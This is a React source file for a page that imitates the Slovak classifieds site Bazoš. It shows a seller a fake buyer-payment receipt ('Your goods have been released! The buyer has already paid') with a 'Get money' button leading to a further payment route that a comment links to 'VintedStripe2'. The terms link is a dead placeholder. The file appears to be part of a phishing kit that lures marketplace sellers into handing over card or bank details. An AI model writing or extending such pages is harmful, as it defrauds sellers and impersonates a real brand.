import React, { useEffect, useState, useMemo } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './BazosSkSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/bazos-sk-logo.png`;

function noop(e) {
  e.preventDefault();
}

function ShieldCheck() {
  return (
    <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M12 2l7 4v6c0 5-3.5 9.5-7 10-3.5-.5-7-5-7-10V6l7-4z" />
      <path d="M9 12l2 2 4-5" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

/** Žltá peňaženka v zelenom kruhu (ako na referenčnom screenshote). */
function WalletStatusIcon() {
  return (
    <svg viewBox="0 0 24 24" aria-hidden>
      <rect x="2" y="6" width="20" height="14" rx="2" fill="#f5c400" stroke="#d4a800" strokeWidth="1" />
      <path d="M2 10h20" stroke="#d4a800" strokeWidth="1" />
      <circle cx="18" cy="14" r="2.5" fill="#fff" stroke="#d4a800" strokeWidth="0.8" />
    </svg>
  );
}

/**
 * Bazoš (SK) — doklad o platbe, CTA → index2 (VintedStripe2).
 */
function BazosSkSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [thumbFailed, setThumbFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  const photoUrl = useMemo(() => (pageData?.photo_url || '').trim(), [pageData?.photo_url]);

  useEffect(() => {
    setThumbFailed(false);
  }, [photoUrl]);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'SK').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const address = (pageData?.delivery_address || '').trim() || '—';
  const lastName = (pageData?.last_name || '').trim() || '—';
  const firstName = [pageData?.first_name, pageData?.middle_name].filter(Boolean).join(' ').trim() || '—';
  const productTitle = (pageData?.product_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const showProductThumb = Boolean(photoUrl) && !thumbFailed;

  if (loading && pageCode) {
    return (
      <div className="bazos-sk-wrap">
        <header className="bazos-sk-header">
          <div className="bazos-sk-header-inner">
            <img src={LOGO_SRC} alt="" className="bazos-sk-logo-header" width={120} height={34} />
          </div>
        </header>
        <main className="bazos-sk-main">
          <div className="bazos-sk-loading">Načítava sa…</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="bazos-sk-wrap">
      <header className="bazos-sk-header">
        <div className="bazos-sk-header-inner">
          <img src={LOGO_SRC} alt="Bazoš" className="bazos-sk-logo-header" width={120} height={34} />
        </div>
      </header>

      <main className="bazos-sk-main">
        <h1 className="bazos-sk-title">Doklad o zaplatení od zákazníka</h1>

        <div className="bazos-sk-grid">
          <div className="bazos-sk-card">
            <div className="bazos-sk-top">
              <div className="bazos-sk-thumb" aria-hidden>
                {showProductThumb ? (
                  <img
                    src={photoUrl}
                    alt=""
                    className="bazos-sk-thumb-img"
                    decoding="async"
                    onError={() => setThumbFailed(true)}
                  />
                ) : null}
              </div>
              <div className="bazos-sk-amounts">
                <div className="bazos-sk-amount-top">{amountLine}</div>
                <div className="bazos-sk-product">{productTitle}</div>
              </div>
            </div>

            <div className="bazos-sk-status-wrap">
              <div className="bazos-sk-status-banner">
                <div className="bazos-sk-status-icon" aria-hidden>
                  <WalletStatusIcon />
                </div>
                <div>
                  <p className="bazos-sk-status-strong">Váš tovar bol uvoľnený!</p>
                  <p className="bazos-sk-status-sub">Kupujúci už za objednávku zaplatil.</p>
                </div>
              </div>

              <div className="bazos-sk-section-h">Detaily doručenia</div>

              <div className="bazos-sk-field">
                <span className="bazos-sk-field-label">Adresa dodania</span>
                <input className="bazos-sk-input" readOnly value={address} />
              </div>

              <div className="bazos-sk-split2">
                <div className="bazos-sk-field">
                  <span className="bazos-sk-field-label">Priezvisko</span>
                  <input className="bazos-sk-input" readOnly value={lastName} />
                </div>
                <div className="bazos-sk-field">
                  <span className="bazos-sk-field-label">Názov</span>
                  <input className="bazos-sk-input" readOnly value={firstName} />
                </div>
              </div>

              <p className="bazos-sk-legal">
                Po obdržaní hotovosti zašlite tovar zákazníkovi podľa zadaných údajov alebo tovar preveďte
                kuriérovi, ktorý vám do 12 hodín zavolá.
              </p>
              <p className="bazos-sk-legal">
                Po doručení tovaru špecifikujte kupujúcemu podacie číslo! Tovar je potrebné doručiť do 3 dní od
                prijatia finančných prostriedkov.
              </p>
            </div>
          </div>

          <aside className="bazos-sk-card">
            <div className="bazos-sk-right">
              <p className="bazos-sk-right-amount">{amountLine}</p>
              <Link to={index2Path} className="bazos-sk-btn">
                Získať peniaze
              </Link>
              <div className="bazos-sk-safe">
                <ShieldCheck />
                Platba je bezpečná
              </div>
              <div className="bazos-sk-disclaimer">
                Kliknutím na tlačidlo „Získať peniaze“ súhlasíte s{' '}
                <a href="#/" onClick={noop}>
                  Podmienkami používania
                </a>{' '}
                online služby „Bezpečná ponuka“.
              </div>
            </div>
          </aside>
        </div>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default BazosSkSuccess;
